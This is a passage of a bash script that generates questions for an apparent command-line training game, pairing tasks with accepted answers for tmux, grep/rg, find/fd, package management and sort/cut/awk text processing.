  questions+=("Install ${pkg} (Debian/Ubuntu)|apt install ${pkg}|sudo apt install ${pkg}|apt-get install ${pkg}|sudo apt-get install ${pkg}|apt install -y ${pkg}|sudo apt install -y ${pkg}|apt-get install -y ${pkg}|sudo apt-get install -y ${pkg}|apt install --yes ${pkg}|sudo apt install --yes ${pkg}|apt-get install --yes ${pkg}|sudo apt-get install --yes ${pkg}")
  questions+=("Install ${pkg} (Fedora/RHEL)|dnf install ${pkg}|sudo dnf install ${pkg}|yum install ${pkg}|sudo yum install ${pkg}|dnf install -y ${pkg}|sudo dnf install -y ${pkg}|yum install -y ${pkg}|sudo yum install -y ${pkg}|dnf install --yes ${pkg}|sudo dnf install --yes ${pkg}|yum install --yes ${pkg}|sudo yum install --yes ${pkg}")
  questions+=("Upgrade all packages (Debian/Ubuntu)|apt upgrade|sudo apt upgrade|apt-get upgrade|sudo apt-get upgrade|apt upgrade -y|sudo apt upgrade -y|apt-get upgrade -y|sudo apt-get upgrade -y|apt upgrade --yes|sudo apt upgrade --yes|apt-get upgrade --yes|sudo apt-get upgrade --yes")
  questions+=("Upgrade all packages (Fedora/RHEL)|dnf upgrade|sudo dnf upgrade|yum upgrade|sudo yum upgrade|dnf upgrade -y|sudo dnf upgrade -y|yum upgrade -y|sudo yum upgrade -y|dnf update|sudo dnf update|yum update|sudo yum update|dnf update -y|sudo dnf update -y|yum update -y|sudo yum update -y|dnf upgrade --yes|sudo dnf upgrade --yes|yum upgrade --yes|sudo yum upgrade --yes|dnf update --yes|sudo dnf update --yes|yum update --yes|sudo yum update --yes")
  questions+=("Search for package ${pkg} (Debian)|apt search ${pkg}|apt-cache search ${pkg}")
  questions+=("Search for package ${pkg} (Fedora)|dnf search ${pkg}|yum search ${pkg}")
  _fphrase "df -h" "free -h" "ss -tlnp" "ps aux"; local watchcmd=$REPLY
  _fphrase 2 5 10; local watchn=$REPLY
  questions+=("Run '${watchcmd}' every ${watchn} seconds|watch -n ${watchn} ${watchcmd}|watch -n${watchn} ${watchcmd}|watch --interval ${watchn} ${watchcmd}|watch --interval=${watchn} ${watchcmd}")
  questions+=("Watch disk space, highlight changes|watch -d df -h|watch --differences df -h|watch -d 'df -h'|watch --differences 'df -h'")
  questions+=("Run full system security audit|lynis audit system|sudo lynis audit system")
  questions+=("Lynis: only audit the 'networking' category|lynis audit system --tests-from-group networking|sudo lynis audit system --tests-from-group networking|lynis audit system --tests-from-group=networking|sudo lynis audit system --tests-from-group=networking")
}
# Level 15: Multiplexers (tmux)
gen_level15() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Start new tmux session|tmux|tmux new|tmux new-session")
  questions+=("Start tmux session named 'work'|tmux new -s work|tmux new-session -s work")
  questions+=("List sessions|tmux ls|tmux list-sessions")
  questions+=("Attach to last session|tmux attach|tmux a|tmux at|tmux attach-session")
  questions+=("Attach to session 'work'|tmux attach -t work|tmux a -t work|tmux at -t work|tmux attach-session -t work")
  questions+=("Kill session 'work'|tmux kill-session -t work|tmux kill-ses -t work")
  questions+=("Kill tmux server (all sessions)|tmux kill-server")
  questions+=("Rename session 'work' to 'dev'|tmux rename-session -t work dev|tmux rename -t work dev")
  questions+=("Create new window in session|tmux new-window|tmux neww")
  questions+=("Create named window 'logs'|tmux new-window -n logs|tmux neww -n logs")
  questions+=("Split pane left/right|tmux split-window -h|tmux splitw -h")
  questions+=("Split pane top/bottom|tmux split-window -v|tmux splitw -v")
  questions+=("List all windows|tmux list-windows|tmux lsw")
  questions+=("Select window 0|tmux select-window -t 0|tmux selectw -t 0|tmux select-window -t :0|tmux selectw -t :0")
  questions+=("Swap current window with window 0|tmux swap-window -t 0|tmux swapw -t 0|tmux swap-window -t :0|tmux swapw -t :0")
  questions+=("List all panes|tmux list-panes|tmux lsp")
  questions+=("Select pane to the right|tmux select-pane -R|tmux selectp -R")
  questions+=("Select pane below|tmux select-pane -D|tmux selectp -D")
  questions+=("Zoom/unzoom pane|tmux resize-pane -Z|tmux resizep -Z")
  questions+=("Kill current pane|tmux kill-pane|tmux killp")
  questions+=("Resize pane down by 10 lines|tmux resize-pane -D 10|tmux resizep -D 10")
  questions+=("Resize pane right by 20 columns|tmux resize-pane -R 20|tmux resizep -R 20")
  questions+=("Swap with next pane|tmux swap-pane -D|tmux swapp -D")
  questions+=("Send 'ls -la' + Enter to session 'work'§tmux send-keys -t work 'ls -la' Enter§tmux send-keys -t work 'ls -la' C-m§~^tmux send-keys -t work ['\"]ls -la['\"] (Enter|C-m)$")
  questions+=("Capture pane output to stdout|tmux capture-pane -p|tmux capturep -p")
  questions+=("Save pane output to file§tmux capture-pane -p > output.txt§tmux capturep -p > output.txt")
  questions+=("Run command in new window§tmux new-window 'htop'§tmux neww 'htop'§tmux new-window htop§tmux neww htop§tmux new-window \"htop\"§tmux neww \"htop\"")
  questions+=("Create session with command§tmux new -s monitor 'htop'§tmux new-session -s monitor 'htop'§tmux new -s monitor htop§tmux new-session -s monitor htop§tmux new -s monitor \"htop\"§tmux new-session -s monitor \"htop\"")
  questions+=("Pipe pane output from session 'work' to ${W}session.log${C}|tmux pipe-pane -t work 'cat >> session.log'|tmux pipep -t work 'cat >> session.log'")
  questions+=("Keybinding: detach from session|Ctrl+b d|ctrl+b d|C-b d|ctrl-b d|Ctrl-b d")
  questions+=("Keybinding: split pane left/right|Ctrl+b %|ctrl+b %|C-b %|ctrl-b %|Ctrl-b %")
  questions+=("Keybinding: split pane top/bottom|Ctrl+b \"|ctrl+b \"|C-b \"|ctrl-b \"|Ctrl-b \"")
  questions+=("Keybinding: cycle to next pane|Ctrl+b o|ctrl+b o|C-b o|ctrl-b o|Ctrl-b o")
  questions+=("Keybinding: toggle pane zoom|Ctrl+b z|ctrl+b z|C-b z|ctrl-b z|Ctrl-b z")
  questions+=("Keybinding: enter copy mode|Ctrl+b [|ctrl+b [|C-b [|ctrl-b [|Ctrl-b [")
  questions+=("Keybinding: show all keybindings|Ctrl+b ?|ctrl+b ?|C-b ?|ctrl-b ?|Ctrl-b ?")
}

# Level 16: Text Search (grep, rg)
gen_level16() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _frnum 1 10; local ctx=$REPLY; _frnum 2 5; local ctx2=$REPLY
  questions+=("Search for '${term}' recursively|grep -r ${term}|grep -r ${term} .|grep --recursive ${term}|grep --recursive ${term} .|rg ${term}|grep -R ${term}|grep -R ${term} .")
  questions+=("Case-insensitive search for '${term}'|grep -ri ${term}|grep -ir ${term}|grep -ri ${term} .|grep --recursive --ignore-case ${term}|grep --recursive --ignore-case ${term} .|rg -i ${term}|rg --ignore-case ${term}|grep -Ri ${term}|grep -iR ${term}|grep -Ri ${term} .|grep -iR ${term} .")
  questions+=("Search '${term}' with line numbers|grep -rn ${term}|grep -nr ${term}|grep -rn ${term} .|grep --recursive --line-number ${term}|grep --recursive --line-number ${term} .|rg -n ${term}|rg --line-number ${term}|grep -Rn ${term}|grep -nR ${term}|grep -Rn ${term} .|grep -nR ${term} .")
  questions+=("Count '${term}' matching lines in ${log}§grep -c ${term} ${log}§grep --count ${term} ${log}§rg -c ${term} ${log}§rg --count ${term} ${log}§grep ${term} ${log} | wc -l")
  questions+=("Search '${term}' with ${ctx} lines context in ${log}|grep -C ${ctx} ${term} ${log}|grep -C${ctx} ${term} ${log}|grep --context ${ctx} ${term} ${log}|grep --context=${ctx} ${term} ${log}|rg -C ${ctx} ${term} ${log}|rg -C${ctx} ${term} ${log}|rg --context ${ctx} ${term} ${log}|rg --context=${ctx} ${term} ${log}")
  questions+=("Show ${ctx2} lines before each '${term}' match in ${log}|grep -B ${ctx2} ${term} ${log}|grep -B${ctx2} ${term} ${log}|grep --before-context ${ctx2} ${term} ${log}|grep --before-context=${ctx2} ${term} ${log}|rg -B ${ctx2} ${term} ${log}|rg -B${ctx2} ${term} ${log}|rg --before-context ${ctx2} ${term} ${log}|rg --before-context=${ctx2} ${term} ${log}")
  questions+=("Show ${ctx} lines after each '${term}' match in ${log}|grep -A ${ctx} ${term} ${log}|grep -A${ctx} ${term} ${log}|grep --after-context ${ctx} ${term} ${log}|grep --after-context=${ctx} ${term} ${log}|rg -A ${ctx} ${term} ${log}|rg -A${ctx} ${term} ${log}|rg --after-context ${ctx} ${term} ${log}|rg --after-context=${ctx} ${term} ${log}")
  _fphrase "List" "Show"; questions+=("${REPLY} only filenames containing '${term}'|grep -rl ${term}|grep -lr ${term}|grep --recursive --files-with-matches ${term}|rg -l ${term}|rg --files-with-matches ${term}|grep -Rl ${term}|grep -lR ${term}|grep -rl ${term} .|grep -Rl ${term} .|grep -lr ${term} .|grep -lR ${term} .")
  questions+=("Lines WITHOUT '${term}' in ${log}|grep -v ${term} ${log}|grep --invert-match ${term} ${log}|rg -v ${term} ${log}|rg --invert-match ${term} ${log}")
  questions+=("Search '${term}' in .${ext} files only|grep -r --include='*.${ext}' ${term}|grep -r --include=\"*.${ext}\" ${term}|grep --recursive --include='*.${ext}' ${term}|rg -g '*.${ext}' ${term}|rg --glob '*.${ext}' ${term}|grep -R --include='*.${ext}' ${term}|grep -R --include=\"*.${ext}\" ${term}")
  questions+=("Search '${term}' in .${ext} and .${ext2} files|grep -r --include='*.${ext}' --include='*.${ext2}' ${term}|rg -g '*.${ext}' -g '*.${ext2}' ${term}|rg --glob '*.${ext}' --glob '*.${ext2}' ${term}|grep -R --include='*.${ext}' --include='*.${ext2}' ${term}")
  questions+=("Search '${term}' excluding .git directory|grep -r --exclude-dir=.git ${term}|grep -r --exclude-dir .git ${term}|rg ${term} -g '!.git'|rg ${term} --glob '!.git'|grep -R --exclude-dir=.git ${term}|grep -R --exclude-dir .git ${term}|rg ${term}")
  questions+=("Search '${term}' excluding ${dir}/ directory|grep -r --exclude-dir=${dir} ${term}|grep -r --exclude-dir ${dir} ${term}|rg ${term} -g '!${dir}'|rg ${term} --glob '!${dir}'|grep -R --exclude-dir=${dir} ${term}|grep -R --exclude-dir ${dir} ${term}")
  questions+=("Search '${term}' in ${dir}/ only|grep -r ${term} ${dir}/|rg ${term} ${dir}/|grep -R ${term} ${dir}/|grep -r ${term} ${dir}|rg ${term} ${dir}|grep -R ${term} ${dir}")
  questions+=("Find lines starting with '${term}'|grep -r '^${term}'|rg '^${term}'|grep -R '^${term}'")
  questions+=("Find lines ending with '${term}'|grep -r '${term}\$'|rg '${term}\$'|grep -R '${term}\$'")
  questions+=("Find lines containing ONLY '${term}'|grep -rx '${term}'|grep --recursive --line-regexp '${term}'|rg -x '${term}'|rg --line-regexp '${term}'|grep -Rx '${term}'")
  questions+=("Find phone pattern XXX-XXX-XXXX|grep -rE '[0-9]{3}-[0-9]{3}-[0-9]{4}'|rg '\\d{3}-\\d{3}-\\d{4}'|grep -RE '[0-9]{3}-[0-9]{3}-[0-9]{4}'|grep -rP '\\d{3}-\\d{3}-\\d{4}'|rg '[0-9]{3}-[0-9]{3}-[0-9]{4}'")
  questions+=("Find IP addresses in ${log}|grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log}|rg -o '\\d+\\.\\d+\\.\\d+\\.\\d+' ${log}|rg -o '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' ${log}|grep -oP '\\d+\\.\\d+\\.\\d+\\.\\d+' ${log}")
  questions+=("Find email addresses|grep -rE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}'|rg '[\\w.+-]+@[\\w.-]+\\.[a-z]{2,}'|grep -RE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}'")
  questions+=("Find URLs in ${log}|grep -oE 'https?://[^ ]+' ${log}|grep -oP 'https?://\\S+' ${log}|rg -o 'https?://\\S+' ${log}")
  questions+=("Find lines with numbers in ${W}${txt}${C}|grep -E '[0-9]+' ${txt}|rg '\\d+' ${txt}|rg '[0-9]+' ${txt}|grep -P '\\d+' ${txt}")
  questions+=("Find hex values (0x...) in ${W}${log}${C}|grep -E '0x[0-9a-fA-F]+' ${log}|grep --extended-regexp '0x[0-9a-fA-F]+' ${log}|rg '0x[0-9a-fA-F]+' ${log}|grep -P '0x[0-9a-fA-F]+' ${log}")
  questions+=("Literal search 'func()' (no regex) in ${W}${txt}${C}|grep -F 'func()' ${txt}|grep --fixed-strings 'func()' ${txt}|rg -F 'func()' ${txt}|rg --fixed-strings 'func()' ${txt}")
  questions+=("Search for literal '[ERROR]' in ${log}|grep -F '[ERROR]' ${log}|grep --fixed-strings '[ERROR]' ${log}|rg -F '[ERROR]' ${log}|rg --fixed-strings '[ERROR]' ${log}")
  questions+=("Search for literal '\$HOME' in ${txt}|grep -F '\$HOME' ${txt}|grep --fixed-strings '\$HOME' ${txt}|rg -F '\$HOME' ${txt}|rg --fixed-strings '\$HOME' ${txt}")
  questions+=("Match whole word '${term}' only|grep -rw ${term}|grep -wr ${term}|grep --recursive --word-regexp ${term}|rg -w ${term}|rg --word-regexp ${term}|grep -Rw ${term}|grep -wR ${term}|grep -rw ${term} .|grep -Rw ${term} .")
  questions+=("Find lines with '${term}' OR '${term2}'§grep -rE '${term}|${term2}'§rg '${term}|${term2}'§grep -RE '${term}|${term2}'§grep -r -e ${term} -e ${term2}§grep -R -e ${term} -e ${term2}§rg -e ${term} -e ${term2}")
  questions+=("Find lines with '${term}', '${term2}', OR '${term3}'§grep -rE '${term}|${term2}|${term3}'§rg '${term}|${term2}|${term3}'§grep -RE '${term}|${term2}|${term3}'§grep -r -e ${term} -e ${term2} -e ${term3}§grep -R -e ${term} -e ${term2} -e ${term3}§rg -e ${term} -e ${term2} -e ${term3}")
  questions+=("Find lines with both '${term}' AND '${term2}'§grep -r ${term} | grep ${term2}§rg ${term} | rg ${term2}§grep -R ${term} | grep ${term2}")
  questions+=("Search for pattern from file ${W}patterns.txt${C}|grep -rf patterns.txt|rg -f patterns.txt|grep -Rf patterns.txt|grep --recursive -f patterns.txt|grep -r --file=patterns.txt|grep -R --file=patterns.txt")
  questions+=("Show only matched text, not whole line in ${W}${log}${C}|grep -o ${term} ${log}|grep --only-matching ${term} ${log}|rg -o ${term} ${log}|rg --only-matching ${term} ${log}")
  questions+=("Quiet mode (exit code only, no output) in ${W}${log}${C}|grep -q ${term} ${log}|grep --quiet ${term} ${log}|grep --silent ${term} ${log}|rg -q ${term} ${log}|rg --quiet ${term} ${log}")
  questions+=("Find ${Y}${term}${C} in ${W}${log}${C}, show first ${ctx} matches§grep ${term} ${log} | head -${ctx}§grep ${term} ${log} | head -n ${ctx}§grep -m ${ctx} ${term} ${log}§grep --max-count ${ctx} ${term} ${log}§grep --max-count=${ctx} ${term} ${log}§rg -m ${ctx} ${term} ${log}§rg --max-count ${ctx} ${term} ${log}§rg --max-count=${ctx} ${term} ${log}")
  questions+=("Count ${Y}${term}${C} lines and show sorted unique in ${W}${log}${C}§grep ${term} ${log} | sort | uniq -c | sort -rn§grep ${term} ${log} | sort | uniq -c | sort -nr§rg ${term} ${log} | sort | uniq -c | sort -rn§rg ${term} ${log} | sort | uniq -c | sort -nr")
  questions+=("If ${Y}${term}${C} found, count matches; else echo 'none' in ${W}${log}${C}§grep -q ${term} ${log} && grep -c ${term} ${log} || echo 'none'§grep --quiet ${term} ${log} && grep -c ${term} ${log} || echo 'none'§grep --silent ${term} ${log} && grep -c ${term} ${log} || echo 'none'§rg -q ${term} ${log} && rg -c ${term} ${log} || echo 'none'")
  questions+=("Search ${Y}${term}${C} in all .${ext} files, save to ${W}results.txt${C}§grep -r ${term} --include='*.${ext}' > results.txt§grep -R ${term} --include='*.${ext}' > results.txt§rg ${term} -g '*.${ext}' > results.txt§rg -g '*.${ext}' ${term} > results.txt")
  questions+=("Find ${Y}${term}${C} lines, extract IPs, count unique in ${W}${log}${C}§grep ${term} ${log} | grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' | sort -u | wc -l§rg ${term} ${log} | rg -o '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' | sort -u | wc -l§grep ${term} ${log} | grep -oP '\\d+\\.\\d+\\.\\d+\\.\\d+' | sort -u | wc -l")
}

# Level 17: File Finding (find, fd)
gen_level17() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx; _frnum 5 60; local time=$REPLY
  questions+=("Find all .${ext} files|find . -name '*.${ext}'|find . -type f -name '*.${ext}'|fd -e ${ext}|fd --extension ${ext}|find -name '*.${ext}'|find -type f -name '*.${ext}'")
  questions+=("Find files named exactly 'config'|find . -name 'config'|find . -type f -name 'config'|fd -g 'config'|fd --glob 'config'|fd -t f -g 'config'|fd --type f -g 'config'|fd --type f --glob 'config'")
  questions+=("Find 'config' files (case-insensitive)|find . -iname '*config*'|find . -type f -iname '*config*'|fd -i config|fd --ignore-case config")
  questions+=("Find files matching '*test*' pattern|find . -name '*test*'|find . -type f -name '*test*'|fd test|fd -g '*test*'")
  questions+=("Find files larger than ${size}|find . -size +${size}|find . -type f -size +${size}|fd -S +${size}|fd --size +${size}")
  questions+=("Find files smaller than ${size}|find . -size -${size}|find . -type f -size -${size}|fd -S -${size}|fd --size -${size}")
  questions+=("Find empty files|find . -type f -empty|find . -empty -type f|fd -t f -S 0b|fd --type f --size 0b")
  questions+=("Find files modified in last ${time} minutes|find . -mmin -${time}|find . -type f -mmin -${time}|fd --changed-within ${time}m")
  questions+=("Find files NOT modified in last 7 days|find . -not -mtime -7|find . ! -mtime -7|find . \\! -mtime -7|find . -type f -not -mtime -7|find . -type f ! -mtime -7|find . -type f \\! -mtime -7|fd --changed-before 7d|fd --changed-before 1w")
  questions+=("Find files modified in last hour|find . -mmin -60|find . -type f -mmin -60|fd --changed-within 1h|fd --changed-within 60m")
  questions+=("Find directories only|find . -type d|fd -t d|fd --type d|fd --type directory")
  questions+=("Find regular files only|find . -type f|fd -t f|fd --type f|fd --type file")
  questions+=("Find symlinks only|find . -type l|fd -t l|fd --type l|fd --type symlink")
  questions+=("Find executable files|find . -type f -executable|find . -executable -type f|fd -t x|fd --type x|fd --type executable")
  questions+=("Find all files including hidden (fd excludes hidden by default)|fd -H|fd --hidden|fd -H .|fd --hidden .")
  questions+=("Find all, excluding .git directory|find . -not -path './.git/*'|find . ! -path './.git/*'|find . \\! -path './.git/*'|fd -E .git|fd --exclude .git|find . -path './.git' -prune -o -print|find . -name .git -prune -o -print")
  questions+=("Find .${ext} files, excluding ${dir}/|find . -name '*.${ext}' -not -path './${dir}/*'|find . -name '*.${ext}' ! -path './${dir}/*'|fd -e ${ext} -E ${dir}|fd --extension ${ext} --exclude ${dir}|fd -e ${ext} --exclude ${dir}|fd --extension ${ext} -E ${dir}")
  questions+=("Find files excluding multiple dirs|find . -not -path './node_modules/*' -not -path './.git/*'|find . ! -path './node_modules/*' ! -path './.git/*'|fd -E node_modules -E .git|fd --exclude node_modules --exclude .git")
  questions+=("Find files in paths matching */${dir}/*|find . -path '*/${dir}/*'|fd -p ${dir}/|fd --full-path ${dir}/")
  questions+=("Find test files in src directory|find . -path '*/src/*' -name '*test*'|fd -p 'src/.*test'|fd --full-path 'src/.*test'")
  questions+=("Find .${ext} files, max 2 levels deep|find . -maxdepth 2 -name '*.${ext}'|find . -name '*.${ext}' -maxdepth 2|fd -e ${ext} -d 2|fd --extension ${ext} --max-depth 2|fd --extension ${ext} -d 2|fd -e ${ext} --max-depth 2")
  questions+=("Find only in current dir (no recursion)|find . -maxdepth 1 -type f|fd -d 1 -t f|fd --max-depth 1 --type f|fd --max-depth 1 --type file")
  questions+=("Find .${ext} files containing '${term}'§find . -name '*.${ext}' -exec grep -l ${term} {} \\;§find . -name '*.${ext}' -exec grep -l ${term} {} +§fd -e ${ext} -x grep -l ${term} {}§fd --extension ${ext} -x grep -l ${term} {}§fd -e ${ext} --exec grep -l ${term}§fd --extension ${ext} --exec grep -l ${term}§grep -rl --include='*.${ext}' ${term} .§grep -Rl --include='*.${ext}' ${term} .§rg -l -g '*.${ext}' ${term}§rg -l --glob '*.${ext}' ${term}")
  questions+=("Find .${ext} files, count total lines§find . -name '*.${ext}' -exec wc -l {} + | tail -1§find . -name '*.${ext}' -exec wc -l {} + | tail -n 1§find . -name '*.${ext}' | xargs wc -l | tail -1§find . -name '*.${ext}' | xargs wc -l | tail -n 1")
  questions+=("Find large files (>${size}), show sizes sorted§find . -size +${size} -exec du -h {} \\; | sort -rh§find . -size +${size} -exec du -h {} + | sort -rh§fd -S +${size} -x du -h {} | sort -rh")
  questions+=("Find .${ext} files modified today, grep for '${term}'§find . -name '*.${ext}' -mtime 0 -exec grep -l ${term} {} \\;§find . -name '*.${ext}' -mtime 0 -exec grep -l ${term} {} +§fd -e ${ext} --changed-within 1d -x grep -l ${term}")
  questions+=("Find empty files and delete them§find . -type f -empty -print -delete§find . -type f -empty -delete§find . -empty -type f -delete§find . -type f -empty -exec rm {} +§find . -type f -empty -exec rm {} \\;§fd -t f -S 0b -x rm {}§fd --type f --size 0b -x rm {}")
}

# Level 18: Data Processing
gen_level18() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _frnum 1 5; local col2=$REPLY; local col3=$((col % 5 + 1)); _frnum 10 80; local chars=$REPLY; _frnum 1 25; local thresh=$REPLY
  ((col3 < col)) && { local _t=$col; col=$col3; col3=$_t; }  # ensure col <= col3 for ranges
  ((n > n2)) && { local _t2=$n; n=$n2; n2=$_t2; }
  questions+=("Sort ${txt} alphabetically|sort ${txt}|sort < ${txt}|cat ${txt} | sort")
  questions+=("Sort ${txt} in reverse|sort -r ${txt}|sort --reverse ${txt}")
  questions+=("Sort ${txt} numerically|sort -n ${txt}|sort --numeric-sort ${txt}")
  questions+=("Sort ${txt} numerically descending|sort -rn ${txt}|sort -nr ${txt}|sort --numeric-sort --reverse ${txt}|sort --reverse --numeric-sort ${txt}|sort -n -r ${txt}|sort -r -n ${txt}")
  questions+=("Sort and remove duplicates in ${W}${txt}${C}§sort -u ${txt}§sort --unique ${txt}§sort ${txt} | uniq")
  questions+=("Sort ${csv} by column ${col}|sort -t, -k${col} ${csv}|sort --field-separator=, -k${col} ${csv}|sort -t, --key=${col} ${csv}|sort --field-separator=, --key=${col} ${csv}")
  questions+=("Sort ${csv} by column ${col} numerically§sort -t, -k${col}n ${csv}§sort -t, -nk${col} ${csv}§sort --field-separator=, -k${col}n ${csv}§sort -t, -k${col} -n ${csv}")
  questions+=("Sort ${csv} by column ${col} descending§sort -t, -k${col}rn ${csv}§sort -t, -rnk${col} ${csv}§sort --field-separator=, -k${col}rn ${csv}§sort -t, -k${col} -rn ${csv}§sort -t, -k${col} -nr ${csv}")
  questions+=("Sort ${txt} by human-readable sizes (1K, 2M, 3G)|sort -h ${txt}|sort --human-numeric-sort ${txt}")
  questions+=("Sort ${txt} case-insensitively|sort -f ${txt}|sort --ignore-case ${txt}")
  questions+=("Sort ${csv} by column ${col} then ${col2}|sort -t, -k${col},${col} -k${col2},${col2} ${csv}|sort --field-separator=, -k${col},${col} -k${col2},${col2} ${csv}")
  questions+=("Remove adjacent duplicate lines in ${W}${txt}${C}|uniq ${txt}|uniq < ${txt}|cat ${txt} | uniq")
  questions+=("Count occurrences of each unique line in ${W}${txt}${C}§sort ${txt} | uniq -c§sort ${txt} | uniq --count")
  questions+=("Show only duplicate lines in ${W}${txt}${C}§sort ${txt} | uniq -d§sort ${txt} | uniq --repeated")
  questions+=("Show only unique lines (appear once) in ${W}${txt}${C}§sort ${txt} | uniq -u§sort ${txt} | uniq --unique")
  questions+=("Count unique lines in ${txt}§sort ${txt} | uniq | wc -l§sort -u ${txt} | wc -l§sort --unique ${txt} | wc -l")
  questions+=("Show all duplicates (repeated lines) in ${W}${txt}${C}§sort ${txt} | uniq -D§sort ${txt} | uniq --all-repeated")
  questions+=("Extract column ${col} from ${csv}|cut -d, -f${col} ${csv}|awk -F, '{print \$${col}}' ${csv}|cut --delimiter=, --fields=${col} ${csv}")
  questions+=("Extract columns ${col} and ${col3} (comma-separated) from ${csv}|cut -d, -f${col},${col3} ${csv}|awk -F, 'BEGIN{OFS=\",\"} {print \$${col}, \$${col3}}' ${csv}|awk -F, '{print \$${col}\",\"\$${col3}}' ${csv}")
  questions+=("Extract columns ${col} through ${col3} in ${W}${csv}${C}|cut -d, -f${col}-${col3} ${csv}|cut --delimiter=, --fields=${col}-${col3} ${csv}")
  questions+=("Extract first ${chars} characters of each line in ${W}${txt}${C}|cut -c1-${chars} ${txt}|cut -c 1-${chars} ${txt}|cut --characters=1-${chars} ${txt}")
  questions+=("Extract from character ${chars} to end of line in ${W}${txt}${C}|cut -c${chars}- ${txt}|cut -c ${chars}- ${txt}|cut --characters=${chars}- ${txt}")
  questions+=("Extract column ${col} from colon-separated file|cut -d: -f${col} /etc/passwd|awk -F: '{print \$${col}}' /etc/passwd")
  questions+=("Extract all but column ${col} in ${W}${csv}${C}|cut -d, --complement -f${col} ${csv}|cut --delimiter=, --complement --fields=${col} ${csv}")
  questions+=("Extract using tab delimiter in ${W}${txt}${C}|cut -f${col} ${txt}|cut --fields=${col} ${txt}|cut -f${col} < ${txt}|cut --fields=${col} < ${txt}")
  questions+=("Print first column of ${txt}|awk '{print \$1}' ${txt}|cat ${txt} | awk '{print \$1}'")
  questions+=("Print last column of each line in ${W}${txt}${C}|awk '{print \$NF}' ${txt}|cat ${txt} | awk '{print \$NF}'")
  questions+=("Print columns ${col} and ${col2} in ${W}${txt}${C}|awk '{print \$${col}, \$${col2}}' ${txt}|cat ${txt} | awk '{print \$${col}, \$${col2}}'")
  questions+=("Print lines longer than ${chars} chars in ${W}${txt}${C}|awk 'length > ${chars}' ${txt}|awk 'length(\$0) > ${chars}' ${txt}")
  questions+=("Print line numbers with content in ${W}${txt}${C}|awk '{print NR, \$0}' ${txt}|cat -n ${txt}|nl -ba ${txt}|grep -n '' ${txt}")
  local _statuses=(active inactive pending); _fpick _statuses; local _status=$REPLY
  questions+=("Sum column 1 of ${W}data.csv${C} (skip header)|awk -F, 'NR>1{sum+=\$1} END {print sum}' data.csv")
  questions+=("Print lines where column 1 > ${thresh} (skip header)|awk -F, 'NR>1 && \$1 > ${thresh}' data.csv")
  questions+=("Print lines where column 4 equals \"${_status}\" in ${W}data.csv${C}|awk -F, '\$4 == \"${_status}\"' data.csv")
  local nth=$((col % 4 + 2))  # 2-5, avoids trivial "every 1st line"
  questions+=("Print every ${nth}th line (${nth}, $((nth*2)), $((nth*3))...) in ${W}${txt}${C}|awk 'NR % ${nth} == 0' ${txt}|sed -n '0~${nth}p' ${txt}")
  questions+=("Print lines ${n} through ${n2} in ${W}${txt}${C}§awk 'NR>=${n} && NR<=${n2}' ${txt}§sed -n '${n},${n2}p' ${txt}§head -n ${n2} ${txt} | tail -n +${n}§head -${n2} ${txt} | tail -n +${n}§awk 'NR==${n},NR==${n2}' ${txt}")
  questions+=("Average of column 1 (skip header)|awk -F, 'NR>1{sum+=\$1; count++} END {print sum/count}' data.csv")
  questions+=("Maximum value in column 1 (skip header)§awk -F, 'NR==2{max=\$1} NR>1 && \$1>max{max=\$1} END{print max}' data.csv§tail -n+2 data.csv | cut -d, -f1 | sort -rn | head -1")
  questions+=("Swap columns 1 and 2 in ${W}${txt}${C} output|awk '{print \$2, \$1}' ${txt}|cat ${txt} | awk '{print \$2, \$1}'")
  questions+=("Print unique values from column ${col} (skip header) in ${W}${csv}${C}§awk -F, 'NR>1 && !seen[\$${col}]++ {print \$${col}}' ${csv}§tail -n+2 ${csv} | cut -d, -f${col} | sort -u")
  questions+=("Count records by column ${col} value in ${W}${csv}${C}§awk -F, 'NR>1{count[\$${col}]++} END {for(k in count) print k, count[k]}' ${csv}§tail -n+2 ${csv} | cut -d, -f${col} | sort | uniq -c")
  questions+=("Replace spaces with tabs in ${W}${txt}${C}|tr ' ' '\\t' < ${txt}|tr ' ' \$'\\t' < ${txt}|sed 's/ /\\t/g' ${txt}")
  questions+=("Delete all digits from ${txt}|tr -d '0-9' < ${txt}|tr --delete '0-9' < ${txt}|tr -d '[:digit:]' < ${txt}|tr --delete '[:digit:]' < ${txt}|sed 's/[0-9]//g' ${txt}|sed 's/[[:digit:]]//g' ${txt}")
  questions+=("Squeeze multiple spaces to single in ${W}${txt}${C}|tr -s ' ' < ${txt}|tr --squeeze-repeats ' ' < ${txt}")
  questions+=("Convert to lowercase in ${W}${txt}${C}|tr 'A-Z' 'a-z' < ${txt}|tr '[:upper:]' '[:lower:]' < ${txt}|awk '{print tolower(\$0)}' ${txt}|sed 's/.*/\\L&/' ${txt}")
  questions+=("Convert to uppercase in ${W}${txt}${C}|tr 'a-z' 'A-Z' < ${txt}|tr '[:lower:]' '[:upper:]' < ${txt}|awk '{print toupper(\$0)}' ${txt}|sed 's/.*/\\U&/' ${txt}")
  questions+=("Delete all whitespace in ${W}${txt}${C}|tr -d '[:space:]' < ${txt}|tr --delete '[:space:]' < ${txt}")
  questions+=("Replace newlines with spaces in ${W}${txt}${C}|tr '\\n' ' ' < ${txt}|paste -sd' ' ${txt}|paste -s -d' ' ${txt}|paste -sd ' ' ${txt}|xargs < ${txt}")
  questions+=("Convert tabs to spaces in ${W}${txt}${C}|tr '\\t' ' ' < ${txt}|expand ${txt}|expand < ${txt}")
  questions+=("Top ${n} most common lines in ${log}§sort ${log} | uniq -c | sort -rn | head -${n}§sort ${log} | uniq -c | sort -rn | head -n ${n}§sort ${log} | uniq -c | sort -nr | head -${n}§sort ${log} | uniq -c | sort -nr | head -n ${n}§sort ${log} | uniq --count | sort -rn | head -${n}§sort ${log} | uniq --count | sort -rn | head -n ${n}")
